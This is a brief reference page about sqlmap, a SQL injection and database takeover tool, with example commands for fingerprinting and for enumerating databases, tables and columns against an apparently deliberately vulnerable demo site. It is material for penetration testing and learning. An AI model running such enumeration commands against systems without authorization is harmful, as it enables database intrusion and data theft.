Subscribe by RSS RSS Icon
Follow me on Twitter Twitter Icon

sqlmap - Automatic SQL Injection and Database Takeover Tool

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers. It comes with a broad range of features lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Database fingerprinting:
./sqlmap.py -u http://testasp.vulnweb.com/showforum.asp?id=1


Database name and current user:
./sqlmap.py -u http://testasp.vulnweb.com/showforum.asp?id=1 --current-db --current-user


Database enumeration:
./sqlmap.py -u http://testasp.vulnweb.com/showforum.asp?id=1 --dbs


Enumerate database tables and columns:
./sqlmap.py -u http://testasp.vulnweb.com/showforum.asp?id=1 --tables --columns


 You can download sqlmap here:

 
Copyright Info.

Only for my personal reference. I do not own any of these materials here. Use it at your own risk!

XHTML/CSS validations
Valid XHTML 1.0 Transitional Valid CSS!